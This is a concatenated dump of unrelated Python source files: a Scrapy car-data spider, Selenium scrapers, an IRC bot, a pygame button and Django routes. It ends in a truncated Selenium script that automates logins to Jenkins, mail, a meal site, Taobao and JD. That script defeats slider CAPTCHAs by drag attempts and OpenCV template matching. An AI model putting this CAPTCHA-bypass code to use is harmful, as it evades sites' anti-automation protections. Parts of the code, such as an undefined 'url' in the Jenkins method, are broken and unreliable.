[\"autohome.com.cn\"]\n url = 'https://www.autohome.com.cn/grade/carhtml/'\n\n def start_requests(self):\n letters = [chr(x) for x in range(ord('A'), ord('Z') + 1)]\n for lett in letters:\n yield scrapy.Request(url=self.url+lett+'.html', callback=self.parse, meta={'splash': {\n 'args': {'lua_source': script},\n 'endpoint': 'render.html'\n }\n })\n\n def parse(self, response):\n for sel in response.xpath('body'):\n item = CarItem()\n Lists = sel.xpath('dl')\n for list in Lists:\n item['brand_name'] = list.xpath('dt/div/a/text()')[0].extract()\n cars = list.xpath('dd/ul[@class=\"rank-list-ul\"]/li[contains(@id,\"s\")]/h4/a/text()').extract()\n i = 0\n for car in cars:\n item['cars'] = car\n item['link'] = list.xpath('dd/ul[@class=\"rank-list-ul\"]/li[contains(@id,\"s\")]/h4/a/@href')[i].extract()\n item['series_id'] = int(re.compile(r'\\/\\/.*\\/(.*)\\/.*').findall(item['link'])[0])\n url = response.urljoin(item['link'])\n i += 1\n\n yield scrapy.Request(url, meta={'brand_name': item['brand_name'], 'sid': item['series_id']}, callback=self.parse_article)\n\n def parse_article(self, response):\n detail = response.xpath('//div[@class=\"carseries-main\"]/div[@class=\"series-list\"]')\n item = CarItem()\n brand_name = response.meta['brand_name']\n sid = response.meta['sid']\n if len(detail) > 0:\n names = detail.xpath('div[@class=\"series-content\"]/div[@id=\"specWrap-2\"]/dl/dd/div[@class=\"spec-name\"]/div[@class=\"name-param\"]')\n for name in names:\n name = name.xpath('p')[0]\n item['carId'] = name.xpath('@data-gcjid').extract()\n item['carName'] = name.xpath('a/text()').extract()\n item['link'] = name.xpath('a/@href')[0].extract()\n url = response.urljoin(item['link'])\n if isinstance(item['carId'], str):\n item['carId'] = int(item['carId'])\n else:\n item['carId'] = int(item['carId'][0])\n\n yield scrapy.Request(url, meta={'carId': item['carId'], 'brand_name': brand_name, 'sid': sid}, callback=self.parse_article_detail)\n\n else:\n detail = response.xpath('//div[@class=\"title\"]/div[@class=\"title-content\"]')\n names = detail.xpath('div')\n for name in names:\n name = name.xpath('div[@class=\"models\"]/div[@class=\"modelswrap\"]/div/div/table/./tr/td[@class=\"name_d\"]/div/a')\n for n in name:\n item['carName'] = n.xpath('text()').extract()\n item['link'] = n.xpath('@href')[0].extract()\n item['carId'] = item['link'][5:-1]\n url = response.urljoin(item['link'])\n if isinstance(item['carId'], str):\n item['carId'] = int(item['carId'])\n else:\n item['carId'] = int(item['carId'][0])\n\n yield scrapy.Request(url, meta={'carId': item['carId'], 'brand_name': brand_name, 'sid': sid}, callback=self.parse_article_detail)\n\n def parse_article_detail(self, response):\n detail = response.xpath('//div[@class=\"container\"]')\n item = CarItem()\n brand_name = response.meta['brand_name']\n sid = response.meta['sid']\n item['carId'] = response.meta['carId']\n item['market_price_str'] = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-con\"]/div[@class=\"information-summary\"]/dl[@class=\"information-price\"]/dd[3]/span[@class=\"factoryprice\"]/text()')[0].extract()\n if item['market_price_str'] == \"暂无\":\n item['market_price_str'] = \"暂无\"\n else:\n item['market_price_str'] = item['market_price_str'].split(\":\")\n item['market_price_str'] = item['market_price_str'][1] + \"万元\"\n item['carBrand'] = detail.xpath('div[@class=\"container athm-sub-nav article-sub-nav\"]/div[@class=\"athm-sub-nav__car\"]/div[@class=\"athm-sub-nav__car__name\"]/a/text()')[0].extract()\n item['carBrand'] = item['carBrand'][:len(item['carBrand'])-1]\n item['cars'] = detail.xpath('div[@class=\"container athm-sub-nav article-sub-nav\"]/div[@class=\"athm-sub-nav__car\"]/div[@class=\"athm-sub-nav__car__name\"]/a/h1/text()')[0].extract()\n item['carName'] = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-tit\"]/h2/text()')[0].extract()\n baseInfo = detail.xpath('div[@class=\"carspec-wrapper\"]/div[@class=\"carspec-main\"]/div[@class=\"spec-information\"]/div[@class=\"information-con\"]/div[@class=\"information-summary\"]/div[@class=\"spec-baseinfo\"]/ul[@class=\"baseinfo-list\"]/li')\n item['link'] = baseInfo[8].xpath('a/@href')[0].extract()\n url = response.urljoin(item['link'])\n\n yield SplashRequest(url, meta={'carId': item['carId'], 'manufacturer': item['carBrand'],\n 'cars': item[\"cars\"], 'carName': item['carName'],\n 'price': item['market_price_str'], 'brand_name': brand_name,\n 'sid': sid},\n callback=self.parse_article_config, args={'wait': 5})\n\n def parse_article_config(self, response):\n html = response.body\n html = str(html.decode('utf-8'))\n item = CarItem()\n\n infos = autohome.fetchCarInfo(html)\n i = 0\n for info in infos:\n item['type_id'] = int(info)\n detail = infos[item['type_id']]\n for key in detail:\n item[\"%s\" % key] = detail[key]\n\n if item['car_name'] == \"-\":\n i += 1\n continue\n item['brand_name'] = response.meta['brand_name']\n item['manufacturer'] = response.meta[\"manufacturer\"]\n item['series_name'] = response.meta[\"cars\"]\n item['series_id'] = response.meta['sid']\n prices = response.xpath('//*[@id=\"tr_2000\"]/td')\n p = []\n for price in prices:\n try:\n price = price.xpath('div/text()').extract()\n p.append(price)\n except:\n pass\n if len(p) == 0:\n break\n else:\n if len(p[i]) > 1:\n p[i] = p[i][0] + p[i][1]\n else:\n p[i] = p[i][0]\n item['market_price_str'] = p[i] + '万元'\n item['manufacturer'] = response.meta['manufacturer']\n names = item['car_name'].split(\" \")\n series = item['series_name'].split(\" \")\n if names[:len(series)] == series[:len(series)]:\n pass\n else:\n item['car_name'] = \" \".join(series[:len(series) + 1]) + \" \" + \" \".join(names[len(series):])\n yield item\n i += 1\n pass\n # type_id = response.meta['carId']\n # item['type_id'] = type_id\n # detail = infos[type_id]\n # for key in detail:\n # item[\"%s\" % key] = detail[key]\n # if item['car_name'] == \"-\":\n # pass\n # else:\n # item['brand_name'] = response.meta['brand_name']\n # item['manufacturer'] = response.meta[\"manufacturer\"]\n # item['series_name'] = response.meta[\"cars\"]\n # price = response.xpath('//*[@id=\"tr_2000\"]/td')\n # try:\n # price = price.xpath('div/text()')[0].extract()\n # except:\n # pass\n # item['market_price_str'] = price + '万元'\n # item['manufacturer'] = response.meta['manufacturer']\n # names = item['car_name'].split(\" \")\n # series = item['series_name'].split(\" \")\n # if names[:len(series)] == series[:len(series)]:\n # pass\n # else:\n # item['car_name'] = \" \".join(series[:len(series)+1]) + \" \" + \" \".join(names[len(series):])\n # yield item\n\n\n\n","sub_path":"car/car/spiders/car_spider.py","file_name":"car_spider.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"433237544","text":"import time\nfrom functools import partial\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom Server import *\nfrom DataRestaurantsParser import *\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom selenium import webdriver\nfrom datetime import datetime\nfrom multiprocessing import Pool\n\n\n\n\n\nclass PhotoRestParsed:\n\n def get_unparsed_restaurants_url(self, restaurants):\n list = []\n\n for rest in restaurants:\n photo_parsed = rest[4]\n if photo_parsed == 0:\n list.append(rest)\n return list\n\n\n def find_photos_in_hero_list(self, driver):\n button_sel = 'tinyThumb '\n urls = []\n try:\n is_exist = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, button_sel)))\n button = driver.find_elements_by_class_name(button_sel)\n server_response_in_html = bs(driver.page_source, 'html.parser')\n photos = server_response_in_html.find_all('div', attrs={'class': 'tinyThumb'})\n for photo in enumerate(photos):\n if photo[0] == 10:\n break\n else:\n url = photo[1]\n urls.append(url['data-bigurl'])\n return urls\n except:\n pass\n\n def get_rest_foto(self, driver, url, id_rest):\n new_url = url + '#photos;aggregationId=&albumid=101&filter=7'\n driver.get(new_url)\n time.sleep(2)\n photo_urls = []\n parsed = 0\n parsed_photo_none = 2\n button_sel = 'photoGridBox'\n try:\n is_exist = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.CLASS_NAME, button_sel)))\n button = driver.find_elements_by_class_name(button_sel)\n server_response_in_html = bs(driver.page_source, 'html.parser')\n photos = server_response_in_html.find_all('div', attrs={'class': 'albumGridItem'})\n if len(photos) == 0:\n photos = self.find_photos_in_hero_list(driver)\n for photo in enumerate(photos):\n photo_url = photo[1]\n photo_urls.append({'restaurantID': id_rest,\n 'photo_url': photo_url,\n 'parsed': parsed})\n else:\n for photo in enumerate(photos):\n if photo[0] == 9:\n break\n else:\n url = photo[1].find('img')\n photo_url = url['src']\n photo_urls.append({'restaurantID': id_rest,\n 'photo_url': photo_url,\n 'parsed': parsed})\n return photo_urls\n\n except:\n # pass\n photo_urls.append({'restaurantID': id_rest,\n 'parsed': parsed_photo_none})\n return photo_urls\n\n\n\n\n\n def start_photo_parse(self, driver, restaurant):\n\n # for rest_urls in tqdm.tqdm(restaurantsList):\n url = restaurant[1]\n id_rest = restaurant[0]\n foto_url = self.get_rest_foto(driver, url, id_rest)\n\n return foto_url\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PhotoRestParser.py","file_name":"PhotoRestParser.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338900382","text":"# -*- coding: utf-8 -*-\nfrom irc3.plugins.command import command\nfrom irc3.plugins.cron import cron\nfrom irc3.plugins.social import Social\nfrom irc3.plugins.social import TwitterAdapter\nfrom irc3.compat import asyncio\nfrom datetime import datetime\nfrom functools import partial\nfrom chut import sh\nimport feedparser\nimport requests\nimport logging\nimport random\nimport irc3\nimport re\n\n\n@irc3.plugin\nclass Alain(object):\n\n def __init__(self, bot):\n bot.config['channel'] = irc3.utils.as_channel(bot.config.channel)\n self.bot = bot\n self.session = requests.Session()\n self.plone = requests.Session()\n try:\n self.plone.auth = tuple(self.bot.config.alain['plone'].split(':'))\n except:\n pass\n\n @irc3.event(irc3.rfc.JOIN)\n def matin(self, mask=None, **kw):\n if mask.nick.startswith(self.bot.nick):\n self.bot.privmsg(self.bot.config.channel, 'matin')\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :(lol|mdr)$')\n def lol(self, mask=None, channel=None, data=None):\n message = random.choice(('MDR', 'hihihi', 'HAHAHA', \"mdr t'es con\"))\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :'\n '.*\\s(faudrai.|faut|ca serait bien que)\\s+qu.*')\n def yakafokon(self, mask=None, channel=None, data=None):\n message = 'WARNING !!! YAKAFOKON DETECTED !!!!'\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(\n ':(?i)(?P\\S+) PRIVMSG {channel} :.*\\sapprendre.*python.*')\n def tutorial(self, mask=None, channel=None, data=None):\n message = (\n '''Pour apprendre python vous pouvez commencer par ici: '''\n 'http://www.afpy.org/doc/python/3.5/tutorial/index.html'\n )\n self.bot.privmsg(self.bot.config.channel, message)\n\n @irc3.event(':(?P\\S+) PRIVMSG {channel} :.*\\soffre.*emploi.*')\n def job(self, mask=None, channel=None, data=None):\n message = (\n '''Pour poster une offre d'emploi veuillez consulter:'''\n ' http://www.afpy.org/doc/afpy/faq.html'\n '#comment-puis-je-poster-une-offre-d-emploi')\n self.bot.privmsg(self.bot.config.channel, message)\n\n @cron('10 9,11,14,17,20 * * *')\n def awaiting_review(self):\n url = 'http://www.afpy.org/search_rss?review_state=pending'\n feed = feedparser.parse(self.plone.get(url).text)\n entries = [str(e.id) for e in feed.entries]\n entries = [e for e in entries if '/forums/' not in e]\n if entries:\n msg = u'Hey! Il y a des trucs à modérer: %s' % ' - '.join(entries)\n self.bot.log.info('%r', msg)\n self.bot.privmsg(self.bot.config.channel, msg)\n\n def incoming_afpyros(self):\n feed = feedparser.parse(self.session.get(\n 'http://afpyro.afpy.org/afpyro.rss').text)\n now = datetime.now()\n now = datetime(now.year, now.month, now.day)\n for e in feed.entries:\n t = e.updated_parsed\n d = datetime(t.tm_year, t.tm_mon, t.tm_mday)\n if d >= now:\n yield d, e.link\n\n @cron('30 17 * * *')\n def afpyro_cron(self, force=False):\n messages = []\n now = datetime.now()\n now = datetime(now.year, now.month, now.day)\n for date, link in self.incoming_afpyros():\n delta = date - now\n message = ''\n if delta.days == 0:\n message = 'Ca va commencer!!! %s' % link\n elif delta.days == 1:\n message = 'C\\'est demain!!! %s' % link\n elif delta.days > 10 and (delta.days % 5 == 0 or force):\n message = 'Prochain afpyro dans %s jours...... *loin* %s' % (\n delta.days, link)\n elif delta.days > 5 and (delta.days % 3 == 0 or force):\n message = 'Prochain afpyro dans %s jours... %s' % (\n delta.days, link)\n elif delta.days > 0 and delta.days < 5:\n message = 'Prochain afpyro dans %s jours! %s' % (\n delta.days, link)\n if message:\n messages.append(message)\n if force:\n return messages\n for msg in messages:\n self.bot.privmsg(self.bot.config.channel, msg)\n\n @command(permission='view')\n def afpyro(self, *args, **kwargs):\n \"\"\"Show incoming afpyro\n\n %%afpyro\n \"\"\"\n for msg in self.afpyro_cron(force=True):\n yield msg\n\n\n@irc3.plugin\nclass AfpySocial(Social):\n\n default_network = 'twitter'\n networks = dict(\n alain=dict(\n adapter=TwitterAdapter,\n factory='twitter.Twitter',\n auth_factory='twitter.OAuth',\n domain='api.twitter.com',\n api_version='1.1',\n secure=True\n ),\n pycon=dict(\n adapter=TwitterAdapter,\n factory='twitter.Twitter',\n auth_factory='twitter.OAuth',\n domain='api.twitter.com',\n api_version='1.1',\n secure=True\n ),\n )\n\n @command(permission='edit')\n def tweet(self, mask, target, args):\n \"\"\"Post to twitter\n\n %%tweet [pycon] ...\n \"\"\"\n # %%tweet (alain|pycon) ...\n if args['pycon']:\n args['--id'] = 'pycon'\n else:\n args['--id'] = 'alain'\n super(AfpySocial, self).tweet(mask, target, args)\n\n def send_alain_tweet(self, message):\n for name, status in self.send_tweet(message, id='alain'):\n self.bot.log.info('[tweet] %s: %s', name, status)\n\n\n# feeds\n\n_afpy_dates = [\n re.compile(r'(\\d{4})/(\\d{2})/(\\d{2}) (\\d{,2}):(\\d{2}):(\\d{2})'),\n re.compile(r'(\\d{4})-(\\d{2})-(\\d{2}) (\\d{,2}):(\\d{2}):(\\d{2})'),\n]\n\n\ndef afpy_date(dt):\n \"\"\"parse a UTC date in MM/DD/YYYY HH:MM:SS format\"\"\"\n g = None\n for afpy_date in _afpy_dates:\n try:\n g = afpy_date.search(dt).groups()\n except:\n pass\n if g:\n return tuple([int(i) for i in g] + [0, 0, 0])\nfeedparser.registerDateHandler(afpy_date)\n\n\ndef feed_dispatcher(bot):\n send_tweet = bot.get_plugin(AfpySocial).send_alain_tweet\n call_later = bot.loop.call_later\n\n def dispatcher(messages):\n for i, (c, m) in enumerate(messages):\n if u'afpy' in m.lower():\n bot.log.info('Sending %r', m)\n # call_later(i + 1, bot.privmsg, c, m)\n call_later(i + 1, send_tweet, m)\n return dispatcher\n","sub_path":"alain/alain3.py","file_name":"alain3.py","file_ext":"py","file_size_in_byte":6565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"566889895","text":"import pygame.font\nclass Button():\n def __init__(self,ai_settings,screen,msg):\n #initialize button attributes\n self.screen = screen\n self.screen_rect = screen.get_rect()\n \n #set dimensions and properties of the Button\n self.width = 200\n self.height = 50\n self.button_color = (0,255,0)\n self.text_color = (255,255,255)\n self.font = pygame.font.SysFont(None,48) #none means use default font\n \n #build button's rect object and center it\n self.rect = pygame.Rect(0,0,self.width,self.height)\n self.rect.center = self.screen_rect.center\n\n #button message needs to prep only once\n self.prep_msg(msg)\n\n def prep_msg(self,msg):\n #turns msg into image and center text on button\n self.msg_image = self.font.render(msg,True,self.text_color,self.button_color)\n self.msg_image_rect = self.msg_image.get_rect()\n self.msg_image_rect.center = self.rect.center\n\n def draw_button(self):\n self.screen.fill(self.button_color,self.rect) #draws rectangular portion of button\n self.screen.blit(self.msg_image,self.msg_image_rect) #draws text image to the screen\n ","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"601959897","text":"from django.urls import path\n\nfrom crop.views import CropAPIView, CropDetailAPIView\n\n\napp_name = 'crop'\n\nurlpatterns = [\n path('crops/', CropAPIView.as_view(), name='crop-list'),\n path('crops//', CropDetailAPIView.as_view(), name='crop-detail')\n]","sub_path":"crop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539753630","text":"import sys\r\nimport os\r\nimport shutil\r\nimport time\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.keys import Keys\r\nimport urllib.request\r\nimport json\r\nimport cv2\r\nimport numpy as np\r\nimport _thread\r\nimport schedule\r\n\r\nTRIGGER_USER = \"Zhou Hehe\"\r\nFLAT_EXIT = False\r\n\r\ndef get_time(): # 20190620-06:30\r\n\treturn datetime.now().strftime('%Y%m%d-%H:%M')\r\n\r\ndef click_locxy(dr, x, y, left_click=True):\r\n\tif left_click:\r\n\t\tActionChains(dr).move_by_offset(x, y).click().perform()\r\n\telse:\r\n\t\tActionChains(dr).move_by_offset(x, y).context_click().perform()\r\n\ttime.sleep(2)\r\n\tActionChains(dr).move_by_offset(-x, -y).perform()\r\n\r\nclass Initial_Firefox():\r\n\tdef __init__(self,firefoxConfig):\r\n\t\tself.firefoxPath = firefoxConfig[\"firefox_path\"]\r\n\t\tself.driver = webdriver.Firefox(self.firefoxPath)\r\n\tdef get_driver(self):\r\n\t\treturn self.driver\r\n\t\t\r\n\r\n\t\r\nclass Trigger_jenkins():\r\n\tdef __init__(self,driver,jenkinsConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = jenkinsConfig['Jekins_addr'] # r'http://build.asrmicro.com/view/Android9.0/job/adroid9.0_ci/'\r\n\t\tself.username = jenkinsConfig['Jekins_username']\r\n\t\tself.password = jenkinsConfig['Jekins_passwd']\r\n\t\r\n\tdef trigger_adroid9_ci(self,idList,projectName):\r\n\t\tdriver = self.driver\r\n\t\tgerritid_list=idList\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title)\r\n\t\t\r\n\t\tdriver.find_element_by_class_name(\"login\").click() #点击右上角login\r\n\t\tdriver.find_element_by_name('j_username').send_keys(self.username)\r\n\t\tdriver.find_element_by_name(\"j_password\").send_keys(self.password)\r\n\t\tdriver.find_element_by_id('yui-gen1-button').click() #点击登录\r\n\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/view/Android9.0/job/adroid9.0_ci/build?delay=0sec']\").click() #点击 Build with Parameters\r\n\t\tgerritid=driver.find_element_by_class_name('setting-input').send_keys(gerritid_list) #输入GERRIT_IDS\r\n\r\n\t\tif projectName == \"aquilac_phone-userdebug\":\r\n\t\t\tprint('Nothing to do')\r\n\t\telif projectName == \"aquilac_phonegms-userdebug\":\r\n\t\t\tdriver.find_element_by_name(\"parameter\").find_element_by_xpath(\"//*[@value='adroid9.0/aquilac_phone-userdebug']\").click() #取消默认的aquilac_phone-userdebug\r\n\t\t\tdriver.find_element_by_name(\"parameter\").find_element_by_xpath(\"//*[@value='adroid9.0/aquilac_phonegms-userdebug']\").click() #选中aquilac_phonegms-userdebug\r\n\t\telse:\r\n\t\t\tprint('Nothing to do')\r\n\t\t\r\n\t\tjs3 = \"window.scrollTo(0,600)\" # 滑动600像素\r\n\t\tdriver.execute_script(js3);time.sleep(2)\r\n\t\t\r\n\t\t\r\n\t\tcheckboxs = driver.find_elements_by_xpath(\".//*[@type='checkbox']\") # 勾上OTA、clean_all复选框\r\n\t\tfor i in checkboxs:\r\n\t\t\ti.click()\r\n\t\tdriver.find_element_by_id('yui-gen1-button').click() #点击build按钮\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//input[@placeholder='find']\").send_keys(TRIGGER_USER + Keys.ENTER);time.sleep(1)#搜索ZhouHehe触发的jenkins的ID\r\n\t\tbuildID = driver.find_elements_by_xpath(\"//*[@update-parent-class='.build-row']\")[0]\r\n\t\tbuildNum = buildID.text.split('#')[1].strip() # buildID.text是提取出来的build NO,如 : #3335\r\n\t\tprint(buildNum) \r\n\t\tbuildID.click()\r\n\t\tprint(url + buildNum)\r\n\t\t#webcontext = urllib.request.urlopen(url + buildNum).read()\r\n\t\t#print(webcontext)\r\n\t\t\r\n\t\tdriver.quit()\r\n\t\treturn url + buildNum\r\n\r\nclass Order_Dinner():\r\n\tdef __init__(self,driver,DinnerConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = DinnerConfig['dinner_addr'] # r\"http://10.1.50.42:8888/\"\r\n\t\r\n\tdef order_a_dinner(self,username,password):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\t#print(driver.title)\r\n\t\tprint(\"===============================\")\r\n\t\tprint((\"订餐系统欢迎您 (%s)\") % (username))\r\n\t\tprint(\"===============================\")\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/login']\").click();time.sleep(0.2)\r\n\t\tdriver.find_element_by_name('email').send_keys(username)\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(password)\r\n\t\tdriver.find_element_by_name(\"submit\").click();time.sleep(0.2)\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/ordering_D']\").click()\r\n\t\tprint(\"%s---已为账户%s订餐\" % (get_time(),username))\r\n\t\t\r\n\t\tcookies = driver.get_cookies()\r\n\t\tprint(cookies)\r\n\t\r\n\tdef exit_account(self):\r\n\t\tdriver = self.driver\r\n\t\tdriver.find_element_by_xpath(\"//*[@href='/auth/logout']\").click()\r\n\t\t\r\n\r\nclass Send_Mail():\r\n\tdef __init__(self,driver,mailConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = mailConfig['mail_addr'] # r'https://mail.asrmicro.com'\r\n\t\tself.username = mailConfig['Mail_username']\r\n\t\tself.password = mailConfig['Mail_passwd']\r\n\r\n\tdef send_a_mail(self,receiver_list,copy_list,title_text,context_text):\r\n\t\tdriver = self.driver \r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title);time.sleep(2) #这里必须加\r\n\t\tdriver.find_element_by_name('username').send_keys(self.username)\r\n\t\tdriver.find_element_by_name(\"password\").send_keys(self.password)\r\n\t\tdriver.find_element_by_class_name('signinbutton').click();time.sleep(2) #点击登录\r\n\t\t \r\n\t\tdriver.find_element_by_xpath(\".//*[@id='_ariaId_35']\").click() #点击新建邮件\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='发送收件人。请输入您的联系人列表中的电子邮件地址或姓名。']\").send_keys(receiver_list)#收件人\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='抄送收件人。请输入您的联系人列表中的电子邮件地址或姓名。']\").send_keys(copy_list) #抄送\r\n\t\tdriver.find_element_by_class_name('_f_ql._f_rl.textbox.allowTextSelection.placeholderText').send_keys(title_text) #邮件主题\r\n\t \r\n\t\tclick_locxy(driver,650,490,True);time.sleep(2) #这里sleep必须加\r\n\t\tdriver.switch_to.active_element.send_keys(context_text);time.sleep(2) #邮件正文\r\n\t\tdriver.find_element_by_xpath(\"//*[@aria-label='发送']\").click()\r\n\t\tdriver.quit()\r\n\r\nclass TaoBao():\r\n\tdef __init__(self,driver,TBConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = TBConfig['tb_addr'] # r'https://www.taobao.com/'\r\n\r\n\tdef taobao_verify(driver,index_y):\r\n\t\t# 获取滑块\r\n\t\telement = driver.find_element_by_xpath(\"//span[@id='nc_1_n1z']\")\r\n\t\tActionChains(driver).click_and_hold(on_element=element).perform()\r\n\t\tActionChains(driver).move_to_element_with_offset(to_element=element, xoffset=index_y, yoffset=0).perform()\r\n\t\tActionChains(driver).release(on_element=element).perform()\r\n\t\ttime.sleep(3)\r\n\r\n\tdef taobao(username,secret):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(driver.title)\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//a[contains(text(),'亲,请登录')]\").click()\r\n\t\tdriver.find_element_by_xpath(\"//i[@id='J_Quick2Static']\").click()\r\n\t\ttime.sleep(0.5)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='TPL_username_1']\").send_keys(username)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='TPL_password_1']\").send_keys(secret)\t\r\n\t\ttime.sleep(0.2)\r\n\t\tindex_y = 200\r\n\t\twhile True:\r\n\t\t\t#time.sleep(2)\r\n\t\t\ttry:\r\n\t\t\t\tself.taobao_verify(driver,index_y)\r\n\t\t\t\tindex_y +=50\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"try----\")\r\n\t\t\t\tbreak\r\n\t\ttime.sleep(2)\r\n\t\tdriver.find_element_by_xpath(\"//button[@id='J_SubmitStatic']\").click()\r\n\t\t\r\n\t\t#driver.find_element_by_xpath(\"//a[contains(text(),'我的京东')]\").click()\r\n\t\t# driver.quit()\r\n\r\nclass JingDong():\r\n\tdef __init__(self,driver,JDConfig):\r\n\t\tself.driver = driver\r\n\t\tself.addr = JDConfig['jd_addr'] # r'https://vip.jd.com/'\r\n\t\r\n\tdef exit_jingdong(self,driver):\r\n\t\tself.driver = driver\r\n\t\t\r\n\r\n\tdef get_jd_beans(self,username,secret):\r\n\t\tdriver = self.driver\r\n\t\tdriver.get(self.addr)\r\n\t\tprint(\"===============================\")\r\n\t\tprint((\"%s (%s)\") % (driver.title,username))\r\n\t\tprint(\"===============================\")\r\n\t\t\r\n\t\tself.exitConditition = False\r\n\t\t_thread.start_new_thread(self.click_invalid_window, (self.driver,))\r\n\t\t\r\n\t\tdriver.find_element_by_xpath(\"//div[@class='login-tab login-tab-r']\").click()\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='loginname']\").send_keys(username)\r\n\t\tdriver.find_element_by_xpath(\"//input[@id='nloginpwd']\").send_keys(secret)\r\n\t\tdriver.find_element_by_xpath(\"//div[@class='login-btn']\").click()\r\n\t\t\r\n\t\ttime.sleep(3)\r\n\t\twhile True:\r\n\t\t\t#time.sleep(2)\r\n\t\t\ttry:\r\n\t\t\t\tself.jd_verify(driver)\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"try----\")\r\n\t\t\t\tbreak\r\n\t\ttime.sleep(5)\r\n\t\t\r\n\t\ttry:\r\n\t\t\tif driver.find_element_by_xpath(\"//span[@class='icon-sign']\").is_displayed():\r\n\t\t\t\tdriver.find_element_by_xpath(\"//span[@class='icon-sign']\").click()\r\n\t\t\t\tprint(\"%s---已为账户%s领取京豆\" % (get_time(),username))\r\n\t\texcept:\r\n\t\t\tprint(\"%s---账户%s领取京豆失败\" % (get_time(),username))\r\n\t\t\tpass\r\n\t\tself.exitConditition = False\r\n\t\ttime.sleep(1)\r\n\t\r\n\tdef jd_verify(driver):\r\n\t\t# 用于找到登录图片的大图\r\n\t\ts2 = r'//div/div[@class=\"JDJRV-bigimg\"]/img'\r\n\t\t# 用来找到登录图片的小滑块\r\n\t\ts3 = r'//div/div[@class=\"JDJRV-smallimg\"]/img'\r\n\t\tbigimg = driver.find_element_by_xpath(s2).get_attribute(\"src\")\r\n\t\tsmallimg = driver.find_element_by_xpath(s3).get_attribute(\"src\")\r\n\t\t#print(smallimg + '\\n')\r\n\t\t#print(bigimg)\r\n\t\t# 背景大图命名\r\n\t\tbackimg = \"backimg.png\"\r\n\t\t# 滑块命名\r\n\t\tslideimg = \"slideimg.png\"\r\n\t\t# 下载背景大图保存到本地\r\n\t\turllib.request.urlretrieve(bigimg, backimg)\r\n\t\t# 下载滑块保存到本地\r\n\t\turllib.request.urlretrieve(smallimg, slideimg)\r\n\t\t# 获取图片并灰度化\r\n\t\tblock = cv2.imread(slideimg, 0)\r\n\t\ttemplate = cv2.imread(backimg, 0)\r\n\t\t# 二值化后的图片名称\r\n\t\tblockName = \"block.jpg\"\r\n\t\ttemplateName = \"template.jpg\"\r\n\t\t# 将二值化后的图片进行保存\r\n\t\tcv2.imwrite(blockName, block)\r\n\t\tcv2.imwrite(templateName, template)\r\n\t\tblock = cv2.imread(blockName)\r\n\t\tblock = cv2.cvtColor(block, cv2.COLOR_RGB2GRAY)\r\n\t\tblock = abs(255 - block)\r\n\t\tcv2.imwrite(blockName, block)\r\n\t\tblock = cv2.imread(blockName)\r\n\t\ttemplate = cv2.imread(templateName)\r\n\t\t# 获取偏移量\r\n\t\tresult = cv2.matchTemplate(block, template, cv2.TM_CCOEFF_NORMED) # 查找block在template中的位置,返回result是一个矩阵,是每个点的匹配结果\r\n\t\tx, y = np.unravel_index(result.argmax(), result.shape)\r\n\t\t#print(\"x方向的偏移\", int(y * 0.4 + 18), 'x:', x, 'y:', y)\r\n\t\t# 获取滑块\r\n\t\telement = driver.find_element_by_xpath(s3)\r\n\t\tActionChains(driver).click_and_hold(on_element=element).perform()\r\n\t\tActionChains(driver).move_to_element_with_offset(to_element=element, xoffset=y, yoffset=0).perform()\r\n\t\tActionChains(driver).release(on_element=element).perform()\r\n\t\ttime.sleep(3)\r\n\r\n\tdef click_invalid_window(self,driver):\r\n\t\twhile True:\r\n\t\t\tif(self.exitConditition == 